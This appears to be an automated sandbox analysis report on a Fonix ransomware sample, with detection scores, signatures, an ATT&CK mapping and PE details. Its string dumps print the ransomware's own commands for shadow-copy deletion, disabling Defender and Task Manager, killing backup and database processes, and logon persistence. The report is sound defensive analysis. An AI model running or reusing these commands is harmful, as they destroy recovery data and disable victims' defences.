Loading ...

Play interactive tourEdit tour

Analysis Report fM498uO16Z

Overview

General Information

Sample Name:fM498uO16Z (renamed file extension from none to exe)
Analysis ID:338145
MD5:e7f086119362368528a160be01f194ad
SHA1:996b28ecb4019f0be9fb2400a040bb1ab422235f
SHA256:e3f297dcc0aac80152ba1af99a2c4c101a1ee88759900da7cdfcc9cb5955f06d

Most interesting Screenshot:

Detection

Fonix
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Fonix ransomware
Yara detected Ransomware_Generic
Deletes shadow drive data (may be related to ransomware)
May drop file containing decryption instructions (likely related to ransomware)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • fM498uO16Z.exe (PID: 1068 cmdline: 'C:\Users\user\Desktop\fM498uO16Z.exe' MD5: E7F086119362368528A160BE01F194AD)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
fM498uO16Z.exeJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
    fM498uO16Z.exeJoeSecurity_FonixYara detected Fonix ransomwareJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmpJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
        00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmpJoeSecurity_FonixYara detected Fonix ransomwareJoe Security
          00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmpJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
            00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmpJoeSecurity_FonixYara detected Fonix ransomwareJoe Security
              Process Memory Space: fM498uO16Z.exe PID: 1068JoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.fM498uO16Z.exe.1180000.0.unpackJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
                  0.2.fM498uO16Z.exe.1180000.0.unpackJoeSecurity_FonixYara detected Fonix ransomwareJoe Security
                    0.0.fM498uO16Z.exe.1180000.0.unpackJoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
                      0.0.fM498uO16Z.exe.1180000.0.unpackJoeSecurity_FonixYara detected Fonix ransomwareJoe Security

                        Sigma Overview

                        No Sigma rule has matched

                        Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus / Scanner detection for submitted sampleShow sources
                        Source: fM498uO16Z.exeAvira: detected
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: fM498uO16Z.exeVirustotal: Detection: 56%Perma Link
                        Source: fM498uO16Z.exeMetadefender: Detection: 22%Perma Link
                        Source: fM498uO16Z.exeReversingLabs: Detection: 55%
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011D89D0 CryptReleaseContext,_Init_thread_footer,0_2_011D89D0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011D8290 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy,0_2_011D8290
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011D8AC0 CryptGenRandom,CryptReleaseContext,0_2_011D8AC0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011D8400 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext,0_2_011D8400
                        Source: fM498uO16Z.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe
                        Source: fM498uO16Z.exeString found in binary or memory: https://code.jquery.com/jquery-latest.js
                        Source: fM498uO16Z.exeString found in binary or memory: https://uupload.ir/files/g510_windows_10.gif
                        Source: fM498uO16Z.exeString found in binary or memory: https://www.who.int

                        Spam, unwanted Advertisements and Ransom Demands:

                        barindex
                        Yara detected Fonix ransomwareShow sources
                        Source: Yara matchFile source: fM498uO16Z.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY
                        Source: Yara matchFile source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
                        Yara detected Ransomware_GenericShow sources
                        Source: Yara matchFile source: fM498uO16Z.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY
                        Source: Yara matchFile source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
                        Deletes shadow drive data (may be related to ransomware)Show sources
                        Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmpBinary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
                        Source: fM498uO16Z.exeBinary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
                        May drop file containing decryption instructions (likely related to ransomware)Show sources
                        Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmpBinary or memory string: How To Decrypt Files.hta\Help.txt
                        Source: fM498uO16Z.exeBinary or memory string: How To Decrypt Files.hta\Help.txt
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0122F14C0_2_0122F14C
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011B31B00_2_011B31B0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0122F9E40_2_0122F9E4
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_012289F80_2_012289F8
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0121F8800_2_0121F880
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_012298880_2_01229888
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0118E0E00_2_0118E0E0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011B1B400_2_011B1B40
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0121F3940_2_0121F394
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0123A3FC0_2_0123A3FC
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0118CAD00_2_0118CAD0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01186D200_2_01186D20
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01195D400_2_01195D40
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011D95900_2_011D9590
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011813F00_2_011813F0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0122DD940_2_0122DD94
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011B4DD00_2_011B4DD0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_012264000_2_01226400
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_012154A40_2_012154A4
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01221CAC0_2_01221CAC
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011884A00_2_011884A0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01185CD00_2_01185CD0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01190F800_2_01190F80
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_012257840_2_01225784
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011B27D00_2_011B27D0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_0121F6180_2_0121F618
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011B46500_2_011B4650
                        Source: classification engineClassification label: mal84.rans.evad.winEXE@1/0@0/0
                        Source: fM498uO16Z.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: fM498uO16Z.exeVirustotal: Detection: 56%
                        Source: fM498uO16Z.exeMetadefender: Detection: 22%
                        Source: fM498uO16Z.exeReversingLabs: Detection: 55%
                        Source: fM498uO16Z.exeStatic file information: File size 1266688 > 1048576
                        Source: fM498uO16Z.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe
                        Source: fM498uO16Z.exeStatic PE information: section name: _RDATA
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_01189877 push rbp; iretd 0_2_01189878
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011F10F0 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_011F10F0

                        Malware Analysis System Evasion:

                        barindex
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                        Source: fM498uO16Z.exeBinary or memory string: OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEYREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /FREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /FREG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FREG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FSTART CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /QSTART CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXITSTART UP ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /FCOPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXEXINOF.EXESCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FFLAG C:\PROGRAMDATA\NONSNONSFLAGBLACK LIST MMS.EXESCHEDUL2.EXESCHEDHELP.EXETIB_MOUNTER_MONITOR.EXESQLIOSIM.EXESQLAGENT.EXESQLMAINT.EXESQLSTUBSS.EXECSRSS.EXESQLCEIP.EXEMSTSC.EXETASKMGR.EXESQLSERVR.EXEQBIDPSERVICE.EXESQLSERVER.EXEMSFTESQL.EXESQLAGENT.EXESQLBROWSER.EXESQLWRITER.EXEORACLE.EXEOCSSD.EXEDBSNMP.EXESYNCTIME.EXEMYDESKTOPQOS.EXEAGNTSVC.EXEISQLPPLUSSVC.EXEISQLPUSSVC.EXEXFSSVCCON.EXEMYDESKTOPSERVICE.EXEOCAUTOUPDS.EXEENCSVC.EXEFIREFOXCONFIG.EXETBIRDCONFIG.EXEOCOMM.EXEMYSQLD.EXEMYSQLD-NT.EXEMYSQLD-OPT.EXEDBENG50.EXESQBCORESERVICE.EXEEXCEL.EXEINFOPATH.EXEMSACCESS.EXEMSPUB.EXEONENOTE.EXEOUTLOOK.EXEPOWERPNT.EXESTREAM.EXETHEBAT.EXETHEBAT64.EXETHUNDERBIRD.EXEVISIO.EXEWINWORD.EXEWORDPAD.EXENOTEPAD.EXEPAINT.EXENOTEPAD++.EXEENDNOTE.EXEVMWAREUSER.EXEVMWARESERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXESANDBOXIEDCOMLAUNCH.EXEPROCMON.EXEREGMON.EXEFILEMON.EXEWIRESHARK.EXENETMON.EXEVMTOOLSD.EXENTOSKRNL.EXESSMS.EXECBSERVICE.EXEHTTPD.EXEJUSCHED.EXEJUCHECK.EXEJAVAW.EXEJAVA.EXEIPTRAY.EXEIPERIUS.EXEFILEZILLA.EXEDATACOLLECTORSVC.EXEEDGETRANSPORT.EXESTORE.EXEACROTRAY.EXEAGENT.EXESAGECSCLIENT.EXEWSUSSERVICE.EXESLACK.EXENODE.EXEW3WP.EXEMYSQL.EXEMSMDSRV.EXEMSDTSSRVR.EXEFDLAUNCHER.EXEFDHOST.EXEREPORTINGS
                        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                        Source: fM498uO16Z.exeBinary or memory string: Output error ::::].FONIXzip filecopy to path \Cpub.keyreg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /freg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /freg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /Freg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /Fstart cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Qstart cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exitstart up attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /Fcopy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exeXINOF.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /Freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /fflag C:\ProgramData\nonsnonsFlagblack list mms.exeschedul2.exeschedhelp.exetib_mounter_monitor.exeSQLIOSIM.EXESqlagent.exesqlmaint.exesqlstubss.execsrss.exesqlceip.exemstsc.exetaskmgr.exesqlservr.exeQBIDPService.exesqlserver.exemsftesql.exesqlagent.exesqlbrowser.exesqlwriter.exeoracle.exeocssd.exedbsnmp.exesynctime.exemydesktopqos.exeagntsvc.exeisqlpplussvc.exeisqlpussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeencsvc.exefirefoxconfig.exetbirdconfig.exeocomm.exemysqld.exemysqld-nt.exemysqld-opt.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepowerpnt.exestream.exethebat.exethebat64.exeThunderbird.exevisio.exewinword.exewordpad.exenotepad.exepaint.exenotepad++.exeendnote.exevmwareuser.exevmwareservice.exevboxservice.exevboxtray.exeSandboxiedcomlaunch.exeprocmon.exeregmon.exefilemon.exewireshark.exenetmon.exevmtoolsd.exentoskrnl.exeSsms.execbService.exehttpd.exejusched.exejucheck.exejavaw.exejava.exeiptray.exeIperius.exeFileZilla.exeDataCollectorSvc.exeEdgeTransport.exestore.exeacrotray.exeagent.exeSageCSClient.exewsusservice.exeslack.exenode.exew3wp.exemysql.exemsmdsrv.exeMsDtsSrvr.exefdlauncher.exefdhost.exeReportingS
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011F20B8 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_011F20B8
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011F20B8 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_011F20B8
                        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_012218C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_012218C8
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011F2E0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_011F2E0C
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: EnumSystemLocalesW,0_2_012391B4
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0123989C
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: EnumSystemLocalesW,0_2_01239284
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: try_get_function,GetLocaleInfoW,0_2_0122D580
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: EnumSystemLocalesW,0_2_0122CFB0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_01238E68
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_012396C0
                        Source: C:\Users\user\Desktop\fM498uO16Z.exeCode function: 0_2_011F32D0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_011F32D0

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management InstrumentationApplication Shimming1Application Shimming1Obfuscated Files or Information1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsFile Deletion1LSASS MemorySecurity Software Discovery121Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerSystem Information Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        fM498uO16Z.exe56%VirustotalBrowse
                        fM498uO16Z.exe25%MetadefenderBrowse
                        fM498uO16Z.exe55%ReversingLabsWin64.PUA.Wacapew
                        fM498uO16Z.exe100%AviraHEUR/AGEN.1138883

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        0.2.fM498uO16Z.exe.1180000.0.unpack100%AviraHEUR/AGEN.1138883Download File
                        0.0.fM498uO16Z.exe.1180000.0.unpack100%AviraHEUR/AGEN.1138883Download File

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://uupload.ir/files/g510_windows_10.giffM498uO16Z.exefalse
                          high
                          https://www.who.intfM498uO16Z.exefalse
                            high
                            https://code.jquery.com/jquery-latest.jsfM498uO16Z.exefalse
                              high

                              Contacted IPs

                              No contacted IP infos

                              General Information

                              Joe Sandbox Version:31.0.0 Red Diamond
                              Analysis ID:338145
                              Start date:11.01.2021
                              Start time:17:59:14
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 5m 35s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:fM498uO16Z (renamed file extension from none to exe)
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:27
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal84.rans.evad.winEXE@1/0@0/0
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 111
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32+ executable (console) x86-64, for MS Windows
                              Entropy (8bit):6.351821525994632
                              TrID:
                              • Win64 Executable Console (202006/5) 92.65%
                              • Win64 Executable (generic) (12005/4) 5.51%
                              • Generic Win/DOS Executable (2004/3) 0.92%
                              • DOS Executable Generic (2002/1) 0.92%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:fM498uO16Z.exe
                              File size:1266688
                              MD5:e7f086119362368528a160be01f194ad
                              SHA1:996b28ecb4019f0be9fb2400a040bb1ab422235f
                              SHA256:e3f297dcc0aac80152ba1af99a2c4c101a1ee88759900da7cdfcc9cb5955f06d
                              SHA512:4b2210e835856c7f3cdd9f0dcd79d0621d4316a945d37cfc083e41ff65acc249f3ec96fa7cb6c40742635038e084ef1a5992be3d40dcef3a8ddbb1fdd3a3031f
                              SSDEEP:24576:t+ePQNk/3Ut+M2nQmlcuo63Zkuy7qrAOyM9ea:t+ePQ2U4MeQKcCWB7hONe
                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........}P^...^...^.......J.......S............?.._.......O.......T...............Q...^...........r.......\......._......._...^..._..

                              File Icon

                              Icon Hash:00828e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x472a74
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows cui
                              Image File Characteristics:EXECUTABLE_IMAGE
                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x5FF6EC6A [Thu Jan 7 11:11:38 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:72154c931598a7b1abbe684878c6b103

                              Entrypoint Preview

                              Instruction
                              dec eax
                              sub esp, 28h
                              call 00007F5608B11298h
                              dec eax
                              add esp, 28h
                              jmp 00007F5608B108B7h
                              int3
                              int3
                              dec eax
                              sub esp, 28h
                              dec ebp
                              mov eax, dword ptr [ecx+38h]
                              dec eax
                              mov ecx, edx
                              dec ecx
                              mov edx, ecx
                              call 00007F5608B10A52h
                              mov eax, 00000001h
                              dec eax
                              add esp, 28h
                              ret
                              int3
                              int3
                              int3
                              inc eax
                              push ebx
                              inc ebp
                              mov ebx, dword ptr [eax]
                              dec eax
                              mov ebx, edx
                              inc ecx
                              and ebx, FFFFFFF8h
                              dec esp
                              mov ecx, ecx
                              inc ecx
                              test byte ptr [eax], 00000004h
                              dec esp
                              mov edx, ecx
                              je 00007F5608B10A55h
                              inc ecx
                              mov eax, dword ptr [eax+08h]
                              dec ebp
                              arpl word ptr [eax+04h], dx
                              neg eax
                              dec esp
                              add edx, ecx
                              dec eax
                              arpl ax, cx
                              dec esp
                              and edx, ecx
                              dec ecx
                              arpl bx, ax
                              dec edx
                              mov edx, dword ptr [eax+edx]
                              dec eax
                              mov eax, dword ptr [ebx+10h]
                              mov ecx, dword ptr [eax+08h]
                              dec eax
                              mov eax, dword ptr [ebx+08h]
                              test byte ptr [ecx+eax+03h], 0000000Fh
                              je 00007F5608B10A4Dh
                              movzx eax, byte ptr [ecx+eax+03h]
                              and eax, FFFFFFF0h
                              dec esp
                              add ecx, eax
                              dec esp
                              xor ecx, edx
                              dec ecx
                              mov ecx, ecx
                              pop ebx
                              jmp 00007F5608B100F2h
                              int3
                              dec eax
                              mov eax, esp
                              dec eax
                              mov dword ptr [eax+08h], ebx
                              dec eax
                              mov dword ptr [eax+10h], ebp
                              dec eax
                              mov dword ptr [eax+18h], esi
                              dec eax
                              mov dword ptr [eax+20h], edi
